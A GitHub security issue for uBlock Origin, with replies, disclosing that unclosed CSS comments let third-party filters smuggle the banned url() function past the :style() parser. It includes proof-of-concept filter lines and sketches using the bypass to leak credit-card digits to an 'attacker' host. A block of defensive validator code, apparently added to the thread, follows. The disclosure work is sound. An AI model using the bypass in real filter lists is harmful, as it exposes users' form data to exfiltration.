uBlockOrigin / uBlock-issues

This is the community-maintained issue tracker for uBlock Origin
https://github.com/gorhill/uBlock

Security: comments can be used to smuggle url() functions into css values. #1693

Closed taviso closed 3 years ago

taviso commented 3 years ago

Prerequisites

I tried to reproduce the issue when...

Description

If I understand the filter security model correctly, third party filter lists are trusted to hide content, but are not permitted to modify or read page content. For this reason, the css url() function is not permitted in any :style() rules, because that could be used to modify and/or exfiltrate content.

I guess the obvious way to exfiltrate content would be to auto-generate a ton of input.creditcard:has-text(/^0/):style(background-image: url(http://attacker/?matched=0) filters, but I guess you already realized this and that's why you ban url() 😃

Anyway, I think I've found a way to get a url() past the parser, it doesn't check if comments are closed in variables, so this filter:

example.com##div:style(--foo: 1/*)
example.com##div[bar="*/;background-image: url(https://google.com);}/*"]

Generates this CSS:

div
{--foo: 1/*}

.div-gpt-ad
{width:1px!important;height:1px!important;min-height:1px!important;}

div[bar="*/;background-image: url(https://google.com);}/*"],
[href^="http://www.FriendlyDuck.com/"],

A specific URL where the issue occurs

https://www.example.com/

Steps to Reproduce

  1. Create the following filter in My filters:
example.com##div:style(--foo: 1/*)
example.com##div[bar="*/;background-image: url(https://storage.googleapis.com/gd-wagtail-prod-assets/original_images/evolving_google_identity_3x2.jpg); background-size: cover;}/*"]

Visit this link, observe that there is an image background. I think this should be impossible.

Screenshot 2021-08-24 221513

Expected behavior

The css url() function is correctly banned.

Actual behavior

The parser is confused by unclosed comments.

uBlock Origin version

1.37.2

Browser name and version

Chrome 92

Operating System and version

Fedora 34
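The filter pair above gets through because the only check on a :style() value is a search for url(), and nothing verifies that a comment opened inside the value is closed before the rule block ends. As an added illustration (not uBlock Origin's own parser), the validator below rejects a :style() value that leaves a comment or string open, contains a brace outside a string or comment, or uses a backslash escape outside a string, in addition to the existing url() ban. The filter-line regex, the function names and the sample URL are assumptions constructed for this example.

```javascript
// Added example, not uBlock Origin code: hardened validation of :style() values.

// The check the issue describes: a url()-only ban. "--foo: 1/*" passes it.
function naiveStyleCheck(value) {
  return !/url\s*\(/i.test(value);
}

// Hardened check. Walks the value once, skipping over well-formed comments and
// quoted strings, and rejects anything that could let this value interact with
// text that follows it in the compiled stylesheet.
function validateStyleValue(value) {
  if (/url\s*\(/i.test(value)) return { ok: false, reason: 'url() not allowed' };
  let i = 0;
  while (i < value.length) {
    const c = value[i];
    if (c === '/' && value[i + 1] === '*') {
      const end = value.indexOf('*/', i + 2);
      // An open comment would swallow the closing brace of this rule and let a
      // later filter's selector text close it, which is the bug in the issue.
      if (end === -1) return { ok: false, reason: 'unterminated comment' };
      i = end + 2;
    } else if (c === '"' || c === "'") {
      let j = i + 1;
      while (j < value.length && value[j] !== c) {
        if (value[j] === '\\') j += 1; // escaped character inside the string
        j += 1;
      }
      if (j >= value.length) return { ok: false, reason: 'unterminated string' };
      i = j + 1;
    } else if (c === '{' || c === '}') {
      // A brace outside a string or comment can close the rule early.
      return { ok: false, reason: 'brace outside string or comment' };
    } else if (c === '\\') {
      // CSS escapes outside strings could spell out tokens the regex above
      // does not see (for example an escaped "u" in front of "rl(").
      return { ok: false, reason: 'escape outside string' };
    } else {
      i += 1;
    }
  }
  return { ok: true, reason: '' };
}

// Runs the check over "hostname##selector:style(value)" lines (assumed syntax
// matching the filters in the issue) and returns the lines to reject.
function rejectedFilters(lines) {
  const rejected = [];
  for (const line of lines) {
    const m = /^([^#]*)##(.*):style\((.*)\)\s*$/.exec(line);
    if (m === null) continue; // plain cosmetic filter, no style value to check
    const verdict = validateStyleValue(m[3]);
    if (!verdict.ok) rejected.push({ line, reason: verdict.reason });
  }
  return rejected;
}

// Constructed input: the two filters from the issue (with a placeholder URL)
// plus one benign :style() filter. Only the first line is rejected; the second
// is harmless on its own because the url() sits inside an attribute string.
const SAMPLE_FILTERS = [
  'example.com##div:style(--foo: 1/*)',
  'example.com##div[bar="*/;background-image: url(https://example.invalid/x.jpg);}/*"]',
  'example.com##.div-gpt-ad:style(width:1px!important;height:1px!important;)',
];

console.log(rejectedFilters(SAMPLE_FILTERS));
```

Multiple declarations separated by ";" inside one :style() are deliberately still allowed, since existing filters such as the .div-gpt-ad rule on this page depend on them; the point of the check is that nothing in a value can reach past the closing brace of its own rule.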

josefhuelk commented 3 years ago

I am using uBlock Origin in Firefox and experienced an HTML/CSS injection.

I checked my clipboard history to confirm that the injection must have happened inside the browser.

This is the full injected code. https://zerobin.net/?4ea4f656641e00a9#dvOszgwDNnt2qCQwyLH/x4hYfgpzsn2KUiqnI9hnTMs=

The injected CSS class is named .sharebtn. The code was not running since it was just in the CSS tag, but the links are very shady. Here are some snippets to make it indexable by search engines:

[href^=""], iframe[src^="https://isupportjournalism.com/"][style], CLOUDFLARE-APP[app-id="no-adblock"], div[style*="box-shadow: rgb(136, 136, 136) 0px 0px 12px; color: "], img[width="320"][height="50"], iframe[width="320"][height="50"], amp-auto-ads,

I am using Firefox. This is the list of active filters. My custom filters are not problematic.

Please fix this.

gorhill commented 3 years ago

@joseftogo These are user CSS styles, that's how cosmetic filtering works. If you don't want cosmetic filtering, you can disable it.